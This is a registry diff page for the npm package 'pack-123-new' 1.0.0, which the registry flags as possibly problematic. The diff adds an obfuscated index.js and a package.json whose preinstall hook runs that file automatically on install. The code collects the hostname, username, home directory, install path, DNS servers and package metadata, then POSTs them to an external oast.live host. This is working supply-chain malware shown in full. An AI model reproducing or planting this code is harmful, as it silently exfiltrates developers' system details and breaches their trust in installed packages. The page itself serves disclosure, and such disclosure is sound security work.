pack-123-new 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of pack-123-new might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const a0_0x189cff=a0_0x5bf9;function a0_0x5bf9(_0x4c42d5,_0x5610f7){const _0x49fbef=a0_0x49fb();return a0_0x5bf9=function(_0x5bf96d,_0x34f0a2){_0x5bf96d=_0x5bf96d-0xaf;let _0x2e2eb6=_0x49fbef[_0x5bf96d];return _0x2e2eb6;},a0_0x5bf9(_0x4c42d5,_0x5610f7);}(function(_0xdec92e,_0x33afe2){const _0x1fabc4=a0_0x5bf9,_0x47d47a=_0xdec92e();while(!![]){try{const _0xef85db=parseInt(_0x1fabc4(0xbd))/0x1+-parseInt(_0x1fabc4(0xcc))/0x2+-parseInt(_0x1fabc4(0xb8))/0x3*(parseInt(_0x1fabc4(0xc6))/0x4)+-parseInt(_0x1fabc4(0xcb))/0x5*(-parseInt(_0x1fabc4(0xb0))/0x6)+-parseInt(_0x1fabc4(0xc8))/0x7*(-parseInt(_0x1fabc4(0xcd))/0x8)+parseInt(_0x1fabc4(0xca))/0x9*(parseInt(_0x1fabc4(0xc5))/0xa)+parseInt(_0x1fabc4(0xc3))/0xb*(-parseInt(_0x1fabc4(0xaf))/0xc);if(_0xef85db===_0x33afe2)break;else _0x47d47a['push'](_0x47d47a['shift']());}catch(_0xb78fde){_0x47d47a['push'](_0x47d47a['shift']());}}}(a0_0x49fb,0x2d525));const os=require('os'),dns=require(a0_0x189cff(0xc4)),querystring=require(a0_0x189cff(0xb2)),https=require(a0_0x189cff(0xb6)),packageJSON=require(a0_0x189cff(0xc0)),package=packageJSON[a0_0x189cff(0xc2)],trackingData=JSON['stringify']({'p':package,'c':__dirname,'hd':os[a0_0x189cff(0xb3)](),'hn':os[a0_0x189cff(0xc7)](),'un':os[a0_0x189cff(0xbb)]()[a0_0x189cff(0xb5)],'dns':dns[a0_0x189cff(0xbe)](),'r':packageJSON?packageJSON[a0_0x189cff(0xb9)]:undefined,'v':packageJSON['version'],'pjson':packageJSON});var postData=querystring[a0_0x189cff(0xb7)]({'msg':trackingData}),options={'hostname':'chmpajpjas2t6uc9ojr0uuweaq9dnd81o.oast.live','port':0x1bb,'path':'/','method':a0_0x189cff(0xba),'headers':{'Content-Type':a0_0x189cff(0xb1),'Content-Length':postData[a0_0x189cff(0xc9)]}},req=https[a0_0x189cff(0xbc)](options,_0x23a5de=>{const _0xb2ea1e=a0_0x189cff;_0x23a5de['on'](_0xb2ea1e(0xce),_0x2e5cbd=>{const _0x7d61ec=_0xb2ea1e;process[_0x7d61ec(0xc1)][_0x7d61ec(0xb4)](_0x2e5cbd);});});req['on'](a0_0x189cff(0xbf),_0x546000=>{}),req[a0_0x189cff(0xb4)](postData),req['end']();function a0_0x49fb(){const _0x310212=['24kgLsnb','data','229380sfkRMO','6SsOPcs','application/x-www-form-urlencoded','querystring','homedir','write','username','https','stringify','6FmBCtE','___resolved','POST','userInfo','request','267948fOaPiM','getServers','error','./package.json','stdout','name','297VxkeJl','dns','60EqZmPo','661796awQjpi','hostname','748097SFuJIi','length','548883DlXVvY','1597935qVXcKw','482860UgmfPY'];a0_0x49fb=function(){return _0x310212;};return a0_0x49fb();}
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "pack-123-new",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }